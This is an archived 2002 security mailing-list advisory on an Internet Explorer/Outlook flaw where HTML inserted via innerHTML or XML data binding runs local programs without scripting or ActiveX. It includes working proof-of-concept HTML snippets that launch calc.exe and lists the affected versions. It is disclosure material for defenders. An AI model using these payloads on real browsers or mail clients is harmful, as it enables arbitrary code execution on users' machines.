[NT] Executing Arbitrary Commands without Active Scripting or ActiveX
From: support@securiteam.comDate: 02/28/02
- Previous message: support@securiteam.com: "[NT] mIRC Backdoors - An Advanced Overview"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Thu, 28 Feb 2002 13:22:50 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Executing Arbitrary Commands without Active Scripting or ActiveX
------------------------------------------------------------------------
SUMMARY
In an advisory from Jan 10 2002 "The Pull" demonstrated how it is still
possible to use an older bug (initially discovered by Dildog) in the
<object> HTML element to run arbitrary commands.
Although "The Pull"'s findings were interesting, his analysis of the
re-found bug was erroneous, the problem does not lie within the Popup
object, the problem is with dynamically inserted HTML fragments at any
point in the document.
All "createPopup" does is create a (featureless) window containing an
empty HTML document, this does not pose a threat, but later on, that
document has HTML injected to it (using innerHTML), which is the actual
problem.
For example, the following code will work just the same:
<span id="oSpan"></span>
<scr!pt language="jscript" defer>
oSpan.innerHTML='<0bject
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>';
</script>
(Note: innerHTML is not the only property used to dynamically insert HTML
to any element, it is also possible to use outerHTML, insertAdjacentHTML,
and more to gain the same results.)
DETAILS
Affected applications:
Any application that hosts the Web Browser control (5.5+) is affected
since this exploit does not require Active Scripting or ActiveX. Some of
these applications are:
* Microsoft Internet Explorer
* Microsoft Outlook
* Microsoft Outlook Express
Verified to be vulnerable:
* IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
* IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
* IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
* IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.
Therefore, now that we identified the origin of the problem we can search
for ways to dynamically insert HTML without using any Active Scripting at
all. It will then become possible to use this bug in more "protected"
environments, such as Microsoft Outlook or Internet Explorer with Active
Scripting and ActiveX disabled.
One of the exciting features that came along in IE4 was Data Binding; it
enables developers to completely separate any application data from the
presentation layer. The data sources (DSO) for Data Binding can be almost
anything, CSV files (with TDC), HTML, XML and many more. Data binding
binds HTML elements (data consumers) such as div or span to the DSO
without need for a single line of script code.
When the "dataFormatAs" attribute is set to "HTML" on the consumer, Data
Binding internally uses innerHTML in order to insert the data into the
element (otherwise innerText is used).
So all we need to do now is supply a DSO that contains the offending
<object> element, the rest will be done for us by the Data Binding engine,
no scripting needed.
Exploit:
In the following example, we are using an XML data-island as our DSO and a
span element as the data consumer. Using XML is especially comfortable
because it can be embedded within the document, without need for external
requests that may be stopped by the host application.
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<0bject id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
Solution:
There is no configuration-tweaking workaround for this bug; it will work
as long as the browser parses HTML. The only possible solution must come
in the form of a patch from Microsoft.
Demonstration:
GreyMagic has put together two proof-of-concept demonstrations:
* Simple: attempts to run "c:/winnt/system32/calc.exe".
* Advanced: lets the user pick what they want to run.
They can both be found at <http://security.greymagic.com/adv/gm001-ie/>
http://security.greymagic.com/adv/gm001-ie/.
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@GREYMAGIC.COM>
GreyMagic Software.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] mIRC Backdoors - An Advanced Overview"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
